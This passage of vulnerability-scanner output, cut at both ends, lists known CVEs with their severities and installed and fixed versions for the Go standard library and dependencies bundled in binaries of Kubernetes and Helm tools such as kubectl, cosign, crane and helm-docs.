CVE-2025-47907 | HIGH | v1.20.4 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.20.4 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.20.4 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.20.4 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.20.4 | 1.24.12, 1.25.6 |
stdlib |
CVE-2023-29406 | MEDIUM | v1.20.4 | 1.19.11, 1.20.6 |
stdlib |
CVE-2023-29409 | MEDIUM | v1.20.4 | 1.19.12, 1.20.7, 1.21.0-rc.4 |
stdlib |
CVE-2023-39318 | MEDIUM | v1.20.4 | 1.20.8, 1.21.1 |
stdlib |
CVE-2023-39319 | MEDIUM | v1.20.4 | 1.20.8, 1.21.1 |
stdlib |
CVE-2023-39326 | MEDIUM | v1.20.4 | 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45284 | MEDIUM | v1.20.4 | 1.20.11, 1.21.4 |
stdlib |
CVE-2023-45289 | MEDIUM | v1.20.4 | 1.21.8, 1.22.1 |
stdlib |
CVE-2023-45290 | MEDIUM | v1.20.4 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24783 | MEDIUM | v1.20.4 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24784 | MEDIUM | v1.20.4 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24785 | MEDIUM | v1.20.4 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24789 | MEDIUM | v1.20.4 | 1.21.11, 1.22.4 |
stdlib |
CVE-2024-24791 | MEDIUM | v1.20.4 | 1.21.12, 1.22.5 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.20.4 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.20.4 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.20.4 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.20.4 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.20.4 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.20.4 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.20.4 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.20.4 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.20.4 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.20.4 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.20.4 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.20.4 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.20.4 | 1.24.11, 1.25.5 |
No Misconfigurations found
root/.local/share/helm/plugins/helm-schema/bin/helm-schema
34 known vulnerabilities found (CRITICAL: 2 HIGH: 8 MEDIUM: 24 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/crypto |
CVE-2024-45337 | CRITICAL | v0.21.0 | 0.31.0 |
golang.org/x/crypto |
CVE-2025-22869 | HIGH | v0.21.0 | 0.35.0 |
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.21.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.21.0 | 0.45.0 |
helm.sh/helm/v3 |
CVE-2025-53547 | HIGH | v3.15.2 | 3.18.4, 3.17.4 |
helm.sh/helm/v3 |
CVE-2025-32386 | MEDIUM | v3.15.2 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-32387 | MEDIUM | v3.15.2 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-55198 | MEDIUM | v3.15.2 | 3.18.5 |
helm.sh/helm/v3 |
CVE-2025-55199 | MEDIUM | v3.15.2 | 3.18.5 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.23.3 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-47907 | HIGH | v1.23.3 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.23.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.23.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.23.3 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.23.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.23.3 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.23.3 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.23.3 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.23.3 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.23.3 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.23.3 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.23.3 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.23.3 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.23.3 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.23.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.23.3 | 1.24.11, 1.25.5 |
No Misconfigurations found
root/.local/share/helm/plugins/helm-unittest/untt
6 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 2 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.42.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.42.0 | 0.45.0 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.11 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.11 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.11 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.11 | 1.24.12, 1.25.6 |
No Misconfigurations found
root/gcrane
6 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 1 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.10 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.24.10 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.24.10 | 1.24.11, 1.25.5 |
No Misconfigurations found
root/krane
6 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 4 MEDIUM: 1)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.10 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.24.10 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.24.10 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/bin/kubectl
1 known vulnerabilities found (CRITICAL: 1 HIGH: 0 MEDIUM: 0 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.6 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
No Misconfigurations found
usr/local/bin/ah
16 known vulnerabilities found (MEDIUM: 8 LOW: 2 CRITICAL: 1 HIGH: 5)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
github.com/containerd/containerd |
CVE-2024-25621 | HIGH | v1.7.28 | 1.7.29 |
github.com/containerd/containerd |
CVE-2025-64329 | MEDIUM | v1.7.28 | 1.7.29 |
github.com/go-git/go-git/v5 |
CVE-2026-25934 | MEDIUM | v5.16.3 | 5.16.5 |
github.com/sigstore/cosign |
CVE-2026-24122 | LOW | v1.13.6 | 3.0.5 |
github.com/sigstore/rekor |
CVE-2026-23831 | MEDIUM | v1.4.2 | 1.5.0 |
github.com/sigstore/rekor |
CVE-2026-24117 | MEDIUM | v1.4.2 | 1.5.0 |
github.com/sigstore/sigstore |
CVE-2026-24137 | MEDIUM | v1.9.5 | 1.10.4 |
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.43.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.43.0 | 0.45.0 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.3 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.25.3 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.25.3 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/chart-doc-gen
42 known vulnerabilities found (MEDIUM: 30 LOW: 0 CRITICAL: 2 HIGH: 10)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
google.golang.org/protobuf |
CVE-2024-24786 | MEDIUM | v1.30.0 | 1.33.0 |
stdlib |
CVE-2024-24790 | CRITICAL | v1.21.2 | 1.21.11, 1.22.4 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.21.2 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2023-39325 | HIGH | v1.21.2 | 1.20.10, 1.21.3 |
stdlib |
CVE-2023-45283 | HIGH | v1.21.2 | 1.20.11, 1.21.4, 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45288 | HIGH | v1.21.2 | 1.21.9, 1.22.2 |
stdlib |
CVE-2024-34156 | HIGH | v1.21.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2025-47907 | HIGH | v1.21.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.21.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.21.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.21.2 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.21.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2023-39326 | MEDIUM | v1.21.2 | 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45284 | MEDIUM | v1.21.2 | 1.20.11, 1.21.4 |
stdlib |
CVE-2023-45289 | MEDIUM | v1.21.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2023-45290 | MEDIUM | v1.21.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24783 | MEDIUM | v1.21.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24784 | MEDIUM | v1.21.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24785 | MEDIUM | v1.21.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24789 | MEDIUM | v1.21.2 | 1.21.11, 1.22.4 |
stdlib |
CVE-2024-24791 | MEDIUM | v1.21.2 | 1.21.12, 1.22.5 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.21.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.21.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.21.2 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.21.2 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.21.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.21.2 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.21.2 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.21.2 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.21.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.21.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.21.2 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.21.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.21.2 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/conftest
4 known vulnerabilities found (CRITICAL: 1 HIGH: 3 MEDIUM: 0 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/container-structure-test
30 known vulnerabilities found (HIGH: 8 MEDIUM: 19 LOW: 1 CRITICAL: 2)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/containerd/containerd |
CVE-2024-25621 | HIGH | v1.7.13 | 1.7.29 |
github.com/containerd/containerd |
CVE-2024-40635 | MEDIUM | v1.7.13 | 1.7.27, 1.6.38 |
github.com/containerd/containerd |
CVE-2025-64329 | MEDIUM | v1.7.13 | 1.7.29 |
github.com/docker/docker |
CVE-2025-54410 | LOW | v27.1.1+incompatible | 28.0.0 |
golang.org/x/crypto |
CVE-2024-45337 | CRITICAL | v0.25.0 | 0.31.0 |
golang.org/x/crypto |
CVE-2025-22869 | HIGH | v0.25.0 | 0.35.0 |
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.25.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.25.0 | 0.45.0 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.22.12 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-47907 | HIGH | v1.22.12 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.22.12 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.22.12 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.22.12 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.22.12 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.22.12 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.22.12 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.22.12 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.22.12 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.22.12 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.22.12 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.22.12 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.22.12 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/cosign
11 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 3 MEDIUM: 7)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/sigstore/fulcio |
CVE-2026-22772 | MEDIUM | v1.8.4 | 1.8.5 |
github.com/sigstore/rekor |
CVE-2026-23831 | MEDIUM | v1.4.3 | 1.5.0 |
github.com/sigstore/rekor |
CVE-2026-24117 | MEDIUM | v1.4.3 | 1.5.0 |
github.com/sigstore/sigstore |
CVE-2026-24137 | MEDIUM | v1.10.3 | 1.10.4 |
github.com/theupdateframework/go-tuf/v2 |
CVE-2026-23991 | MEDIUM | v2.3.0 | 2.3.1 |
github.com/theupdateframework/go-tuf/v2 |
CVE-2026-23992 | MEDIUM | v2.3.0 | 2.3.1 |
github.com/theupdateframework/go-tuf/v2 |
CVE-2026-24686 | MEDIUM | v2.3.0 | 2.4.1 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/crane
6 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 1 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.10 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.24.10 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.10 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.24.10 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/ct
7 known vulnerabilities found (CRITICAL: 1 HIGH: 4 MEDIUM: 2 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.2 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.25.2 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.25.2 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.25.2 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/gomplate
3 known vulnerabilities found (MEDIUM: 1 LOW: 1 CRITICAL: 1 HIGH: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
github.com/go-git/go-git/v5 |
CVE-2026-25934 | MEDIUM | v5.16.4 | 5.16.5 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.6 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
No Misconfigurations found
usr/local/bin/helm
1 known vulnerabilities found (CRITICAL: 0 HIGH: 0 MEDIUM: 0 LOW: 1)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
No Misconfigurations found
usr/local/bin/helm-docs
42 known vulnerabilities found (HIGH: 11 MEDIUM: 28 LOW: 0 CRITICAL: 3)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/crypto |
CVE-2024-45337 | CRITICAL | v0.21.0 | 0.31.0 |
golang.org/x/crypto |
CVE-2025-22869 | HIGH | v0.21.0 | 0.35.0 |
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.21.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.21.0 | 0.45.0 |
helm.sh/helm/v3 |
CVE-2025-53547 | HIGH | v3.15.2 | 3.18.4, 3.17.4 |
helm.sh/helm/v3 |
CVE-2025-32386 | MEDIUM | v3.15.2 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-32387 | MEDIUM | v3.15.2 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-55198 | MEDIUM | v3.15.2 | 3.18.5 |
helm.sh/helm/v3 |
CVE-2025-55199 | MEDIUM | v3.15.2 | 3.18.5 |
stdlib |
CVE-2024-24790 | CRITICAL | v1.22.1 | 1.21.11, 1.22.4 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.22.1 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2023-45288 | HIGH | v1.22.1 | 1.21.9, 1.22.2 |
stdlib |
CVE-2024-24788 | HIGH | v1.22.1 | 1.22.3 |
stdlib |
CVE-2024-34156 | HIGH | v1.22.1 | 1.22.7, 1.23.1 |
stdlib |
CVE-2025-47907 | HIGH | v1.22.1 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.22.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.22.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.22.1 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.22.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2024-24789 | MEDIUM | v1.22.1 | 1.21.11, 1.22.4 |
stdlib |
CVE-2024-24791 | MEDIUM | v1.22.1 | 1.21.12, 1.22.5 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.22.1 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.22.1 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.22.1 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.22.1 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.22.1 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.22.1 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.22.1 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.22.1 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.22.1 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.22.1 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.22.1 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.22.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.22.1 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kube-linter
4 known vulnerabilities found (MEDIUM: 0 LOW: 0 CRITICAL: 1 HIGH: 3)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61730 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
No Misconfigurations found
usr/local/bin/kube-score
24 known vulnerabilities found (MEDIUM: 17 LOW: 0 CRITICAL: 1 HIGH: 6)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/net |
CVE-2025-22872 | MEDIUM | v0.36.0 | 0.38.0 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.23.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-47907 | HIGH | v1.23.5 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.23.5 | 1.24.12, 1.25.6 |
stdlib |
